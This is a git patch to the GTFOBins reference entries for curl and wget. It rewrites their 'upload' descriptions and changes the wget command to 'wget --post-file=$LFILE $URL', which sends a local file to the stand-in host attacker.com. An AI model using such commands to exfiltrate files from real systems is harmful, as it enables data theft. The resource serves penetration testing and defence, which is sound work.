From 689e00461de3f98011904e46878f7e5f80dd3e0c Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Tue, 25 Sep 2018 19:51:20 +0200 Subject: [PATCH] Get rid of base64 for curl and wget and make descriptions similar Close #24. --- _gtfobins/curl.md | 2 +- _gtfobins/wget.md | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index ed228e9..8d3dacc 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -1,7 +1,7 @@ --- functions: upload: - - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. + - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Omit the `@` to send hard-coded data. code: | URL=http://attacker.com/ LFILE=file_to_send diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index 659f81e..e50d330 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -1,11 +1,11 @@ --- functions: upload: - - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. + - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. code: | export URL=http://attacker.com/ export LFILE=file_to_send - wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL + wget --post-file=$LFILE $URL download: - description: Fetch a remote file via HTTP GET request. code: |